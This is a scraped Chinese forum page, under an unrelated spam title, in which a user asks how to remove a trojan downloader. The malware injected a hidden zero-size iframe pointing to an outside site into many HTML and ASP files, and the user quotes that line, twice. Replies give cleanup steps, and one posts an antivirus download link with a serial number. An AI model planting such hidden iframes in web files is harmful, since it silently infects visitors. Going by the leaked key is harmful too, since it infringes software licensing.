神马品牌网dota2强势英雄斯温:很厉害的病毒,谁帮我解决加送分
来源:百度文库 编辑:神马品牌网 时间:2024/04/29 11:54:47
我发现我的C:\WINDOWS\Web\printers里的ASP文件里以及电脑里所有盘里的多数HTML文件全都被添加了恶意代码如下:
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder
至于系统其他地方是否被改目前尚不知道,病毒原理是这样:
病毒会自动伪装成QQ或者其他什么程序的UPDATE连接到网络上,下载update.exe(这个是假的),pp1.exe,pp2.exe,pp3.exe,pp4.exe,pp5.exe,pp6.exe到你的C:\Program Files\Common Files\update目录下,然后在启动项中自动产生一个C:\Program Files\Common Files\update\update.exe,用NOD32不能检查出被修改恶意代码的ASP和
html文件,只能干掉它产生的病毒文件,也尝试了用EWIDO,木马客星,木马杀客,不过效果相同.LOG里什么也看不出来,顶多能看见中毒后它生成的启动项,
请问高手们谁知道如何处理这样的病毒?
PS:重装系统是不行的
杀软方面不用推荐了,此病毒不是一般的病毒,现在的问题是整个电脑上百个文件被篡改,动着一个就会死灰复燃,有了解或者遇到过此病毒的朋友请指点一下
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder
至于系统其他地方是否被改目前尚不知道,病毒原理是这样:
病毒会自动伪装成QQ或者其他什么程序的UPDATE连接到网络上,下载update.exe(这个是假的),pp1.exe,pp2.exe,pp3.exe,pp4.exe,pp5.exe,pp6.exe到你的C:\Program Files\Common Files\update目录下,然后在启动项中自动产生一个C:\Program Files\Common Files\update\update.exe,用NOD32不能检查出被修改恶意代码的ASP和
html文件,只能干掉它产生的病毒文件,也尝试了用EWIDO,木马客星,木马杀客,不过效果相同.LOG里什么也看不出来,顶多能看见中毒后它生成的启动项,
请问高手们谁知道如何处理这样的病毒?
PS:重装系统是不行的
杀软方面不用推荐了,此病毒不是一般的病毒,现在的问题是整个电脑上百个文件被篡改,动着一个就会死灰复燃,有了解或者遇到过此病毒的朋友请指点一下
建议你用NOD32查一下,如果还是不行的话在用卡巴杀,如果还是杀不了的话,那就要装一下防火墙,再把<iframe>里的代码删除,注意一定要清楚干静了。用Advanced Find and Replace这个工具批量替换掉。干掉进程里的PP3。EXE要不好象不能删除,把Update。EXE文件移到别的地方去,把COMMAND。EXE文件删除。关闭系统的自动播放功能。防火墙这一关要把好。这样一般就没问题了。呵呵,我的一点心得。
好象在一本书上见过这个病毒,突然间忘了..有没高手呐``帮帮忙呀
找到了找到了!!!
下载者变种aa(Troj.Downloader.aa)
病毒特征:这是一个可大量下载其他木马的木马病毒。
打开任务管理器,看看有没有explore.exe\explored.exe之类的进程,有则关掉它们,然后找到c:\Windows\inf\mybw.exe
删除mybw.exe
注意不要把explorer.exe关了,那是桌面进程
建议你安全模式下使用主流杀毒软件的最新版杀毒
没有杀毒软件的化到这里下载
有今天最新的瑞星
http://www.luckfish.net/rising.htm
序列号:0HFL01-P5BTG0-E18HS8-9DE200
ID:W26D5UQJS200 (能不能用靠你运气咯`)
复制病毒的名字到BAI DU搜索~然后查他的专杀,查到后就下载专杀文件,下载好后就可以杀咯~~
?